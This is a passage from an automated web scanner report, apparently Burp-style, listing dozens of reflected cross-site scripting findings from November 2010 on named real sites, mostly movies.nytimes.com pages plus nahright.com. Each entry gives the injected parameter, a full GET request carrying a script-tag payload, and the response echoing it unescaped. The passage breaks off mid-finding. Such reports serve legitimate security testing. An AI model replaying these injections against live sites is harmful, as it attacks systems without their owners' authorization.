The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40d84"><script>alert(1)</script>ce1cd022825 was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/10/movies/10morning.html?src=dayp40d84"><script>alert(1)</script>ce1cd022825 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:07 GMT Content-type: text/html Content-Length: 74132
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/10/movies/10morning.html?src=dayp40d84"><script>alert(1)</script>ce1cd022825&pagewanted=print"> ...[SNIP]...
3.148. http://movies.nytimes.com/2010/11/12/movies/12con.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12con.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff212"><script>alert(1)</script>0c4b8fd9ceb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12con.html?ff212"><script>alert(1)</script>0c4b8fd9ceb=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:19 GMT Content-type: text/html Content-Length: 68389
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12con.html?ff212"><script>alert(1)</script>0c4b8fd9ceb=1&pagewanted=print"> ...[SNIP]...
3.149. http://movies.nytimes.com/2010/11/12/movies/12con.html [ref parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12con.html
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31673"><script>alert(1)</script>5674461d5ef was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12con.html?ref=todayspaper31673"><script>alert(1)</script>5674461d5ef HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:24 GMT Content-type: text/html Content-Length: 67711
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12con.html?ref=todayspaper31673"><script>alert(1)</script>5674461d5ef&pagewanted=print"> ...[SNIP]...
3.150. http://movies.nytimes.com/2010/11/12/movies/12cool.html [hpw parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12cool.html
Issue detail
The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6752"><script>alert(1)</script>74abf7409cf was submitted in the hpw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12cool.html?hpwe6752"><script>alert(1)</script>74abf7409cf HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:14 GMT Content-type: text/html Content-Length: 72542
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12cool.html?hpwe6752"><script>alert(1)</script>74abf7409cf&pagewanted=print"> ...[SNIP]...
3.151. http://movies.nytimes.com/2010/11/12/movies/12cool.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12cool.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87b8d"><script>alert(1)</script>54b1ab9b218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12cool.html?hpw&87b8d"><script>alert(1)</script>54b1ab9b218=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:15 GMT Content-type: text/html Content-Length: 72399
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12cool.html?hpw&87b8d"><script>alert(1)</script>54b1ab9b218=1&pagewanted=print"> ...[SNIP]...
3.152. http://movies.nytimes.com/2010/11/12/movies/12cool.html [ref parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12cool.html
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dd44"><script>alert(1)</script>9aa1f156ce7 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12cool.html?ref=todayspaper8dd44"><script>alert(1)</script>9aa1f156ce7 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:20 GMT Content-type: text/html Content-Length: 72629
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12cool.html?ref=todayspaper8dd44"><script>alert(1)</script>9aa1f156ce7&pagewanted=print"> ...[SNIP]...
3.153. http://movies.nytimes.com/2010/11/12/movies/12disco.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12disco.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9017b"><script>alert(1)</script>45b207650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12disco.html?9017b"><script>alert(1)</script>45b207650=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:27 GMT Content-type: text/html Content-Length: 72730
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12disco.html?9017b"><script>alert(1)</script>45b207650=1&pagewanted=print"> ...[SNIP]...
3.154. http://movies.nytimes.com/2010/11/12/movies/12disco.html [ref parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12disco.html
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d08f"><script>alert(1)</script>69375a1df98 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12disco.html?ref=todayspaper2d08f"><script>alert(1)</script>69375a1df98 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:30 GMT Content-type: text/html Content-Length: 69744
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12disco.html?ref=todayspaper2d08f"><script>alert(1)</script>69375a1df98&pagewanted=print"> ...[SNIP]...
3.155. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12eichmann.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1b27"><script>alert(1)</script>9def6fb92c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12eichmann.html?b1b27"><script>alert(1)</script>9def6fb92c5=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:31 GMT Content-type: text/html Content-Length: 73079
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12eichmann.html?b1b27"><script>alert(1)</script>9def6fb92c5=1&pagewanted=print"> ...[SNIP]...
3.156. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [ref parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12eichmann.html
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a15af"><script>alert(1)</script>c361f4dc1e3 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12eichmann.html?ref=todayspapera15af"><script>alert(1)</script>c361f4dc1e3 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:32 GMT Content-type: text/html Content-Length: 71255
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12eichmann.html?ref=todayspapera15af"><script>alert(1)</script>c361f4dc1e3&pagewanted=print"> ...[SNIP]...
3.157. http://movies.nytimes.com/2010/11/12/movies/12helena.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12helena.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a48c1"><script>alert(1)</script>f0282204989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12helena.html?a48c1"><script>alert(1)</script>f0282204989=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:29 GMT Content-type: text/html Content-Length: 67007
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12helena.html?a48c1"><script>alert(1)</script>f0282204989=1&pagewanted=print"> ...[SNIP]...
3.158. http://movies.nytimes.com/2010/11/12/movies/12helena.html [ref parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12helena.html
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64df0"><script>alert(1)</script>d14aae068de was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12helena.html?ref=todayspaper64df0"><script>alert(1)</script>d14aae068de HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:32 GMT Content-type: text/html Content-Length: 66696
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12helena.html?ref=todayspaper64df0"><script>alert(1)</script>d14aae068de&pagewanted=print"> ...[SNIP]...
3.159. http://movies.nytimes.com/2010/11/12/movies/12magic.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12magic.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd739"><script>alert(1)</script>dc7aa52ab74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12magic.html?cd739"><script>alert(1)</script>dc7aa52ab74=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:29 GMT Content-type: text/html Content-Length: 65843
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12magic.html?cd739"><script>alert(1)</script>dc7aa52ab74=1&pagewanted=print"> ...[SNIP]...
3.160. http://movies.nytimes.com/2010/11/12/movies/12magic.html [ref parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12magic.html
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1406e"><script>alert(1)</script>b4e8ca7152d was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12magic.html?ref=todayspaper1406e"><script>alert(1)</script>b4e8ca7152d HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:34 GMT Content-type: text/html Content-Length: 66285
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12magic.html?ref=todayspaper1406e"><script>alert(1)</script>b4e8ca7152d&pagewanted=print"> ...[SNIP]...
3.161. http://movies.nytimes.com/2010/11/12/movies/12shake.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12shake.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cb50"><script>alert(1)</script>3a8abc30d4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12shake.html?3cb50"><script>alert(1)</script>3a8abc30d4a=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:24 GMT Content-type: text/html Content-Length: 73541
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12shake.html?3cb50"><script>alert(1)</script>3a8abc30d4a=1&pagewanted=print"> ...[SNIP]...
3.162. http://movies.nytimes.com/2010/11/12/movies/12shake.html [ref parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12shake.html
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 936e2"><script>alert(1)</script>24773b8c686 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12shake.html?ref=todayspaper936e2"><script>alert(1)</script>24773b8c686 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:22 GMT Content-type: text/html Content-Length: 74178
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12shake.html?ref=todayspaper936e2"><script>alert(1)</script>24773b8c686&pagewanted=print"> ...[SNIP]...
3.163. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12tiny.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f8da"><script>alert(1)</script>c3bf061f155 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12tiny.html?1f8da"><script>alert(1)</script>c3bf061f155=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:09 GMT Content-type: text/html Content-Length: 72793
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12tiny.html?1f8da"><script>alert(1)</script>c3bf061f155=1&pagewanted=print"> ...[SNIP]...
3.164. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [ref parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12tiny.html
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5e7b"><script>alert(1)</script>5a75fc2d357 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12tiny.html?ref=todayspaperf5e7b"><script>alert(1)</script>5a75fc2d357 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:11 GMT Content-type: text/html Content-Length: 73419
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12tiny.html?ref=todayspaperf5e7b"><script>alert(1)</script>5a75fc2d357&pagewanted=print"> ...[SNIP]...
3.165. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [hpw parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12unstop.html
Issue detail
The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffbd2"><script>alert(1)</script>07947578a14 was submitted in the hpw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12unstop.html?hpwffbd2"><script>alert(1)</script>07947578a14 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:18 GMT Content-type: text/html Content-Length: 74619
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?hpwffbd2"><script>alert(1)</script>07947578a14&pagewanted=print"> ...[SNIP]...
3.166. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12unstop.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea22b"><script>alert(1)</script>b2be1849c05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12unstop.html?ea22b"><script>alert(1)</script>b2be1849c05=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:01 GMT Content-type: text/html Content-Length: 73539
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?ea22b"><script>alert(1)</script>b2be1849c05=1&pagewanted=print"> ...[SNIP]...
3.167. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [ref parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12unstop.html
Issue detail
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63a87"><script>alert(1)</script>e87edf3b78 was submitted in the ref parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12unstop.html?ref=todayspaper63a87"><script>alert(1)</script>e87edf3b78 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:15 GMT Content-type: text/html Content-Length: 74735
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?ref=todayspaper63a87"><script>alert(1)</script>e87edf3b78&pagewanted=print"> ...[SNIP]...
3.168. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/12/movies/12unstop.html
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e5f"><script>alert(1)</script>7ccb997166a was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/movies/12unstop.html?src=dayp98e5f"><script>alert(1)</script>7ccb997166a HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:11 GMT Content-type: text/html Content-Length: 74106
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?src=dayp98e5f"><script>alert(1)</script>7ccb997166a&pagewanted=print"> ...[SNIP]...
3.169. http://movies.nytimes.com/2010/11/13/movies/13sky.html [hpw parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/13/movies/13sky.html
Issue detail
The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 221ad"><script>alert(1)</script>f35b5011bda was submitted in the hpw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/13/movies/13sky.html?hpw221ad"><script>alert(1)</script>f35b5011bda HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:34 GMT Content-type: text/html Content-Length: 72211
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/13/movies/13sky.html?hpw221ad"><script>alert(1)</script>f35b5011bda&pagewanted=print"> ...[SNIP]...
3.170. http://movies.nytimes.com/2010/11/13/movies/13sky.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /2010/11/13/movies/13sky.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad1ea"><script>alert(1)</script>f474dec4118 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/13/movies/13sky.html?ad1ea"><script>alert(1)</script>f474dec4118=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:33 GMT Content-type: text/html Content-Length: 70797
...[SNIP]... <a href="http://movies.nytimes.com/2010/11/13/movies/13sky.html?ad1ea"><script>alert(1)</script>f474dec4118=1&pagewanted=print"> ...[SNIP]...
3.171. http://movies.nytimes.com/movie/401469/Unstoppable/overview [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://movies.nytimes.com
Path: /movie/401469/Unstoppable/overview
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba18d"><script>alert(1)</script>494c7d4f0db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movie/401469/Unstoppable/overview?ba18d"><script>alert(1)</script>494c7d4f0db=1 HTTP/1.1 Host: movies.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:06:09 GMT Content-type: text/html Content-Length: 43755
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Unstoppable - Trailer - Cast - Showtimes - NYTimes.com </title>
...[SNIP]... <meta name="communityAssetTaxonomy" content="movie//Unstoppable?ba18d"><script>alert(1)</script>494c7d4f0db=1"> ...[SNIP]...
3.172. http://nahright.com/news/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nahright.com
Path: /news/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a3bf</script><script>alert(1)</script>5635fe9c9d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/?6a3bf</script><script>alert(1)</script>5635fe9c9d9=1 HTTP/1.1 Host: nahright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=PROMIRS192.168.100.41CKOMM; path=/ Date: Sat, 13 Nov 2010 02:08:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Vary: Cookie,Accept-Encoding X-Pingback: http://nahright.com/news/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77592
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/x ...[SNIP]... <script> COMSCORE.beacon({ c1:2, c2:6685975, c3:"", c4:"nahright.com/news/?6a3bf</script><script>alert(1)</script>5635fe9c9d9=1", c5:"", c6:"", c15:"" }); </script> ...[SNIP]...
3.173. http://opinionator.blogs.nytimes.com/2010/11/11/a-republican-for-higher-taxes/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /2010/11/11/a-republican-for-higher-taxes/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51c1"><script>alert(1)</script>380bf182eb4 was submitted in the src parameter. This input was echoed as b51c1\"><script>alert(1)</script>380bf182eb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
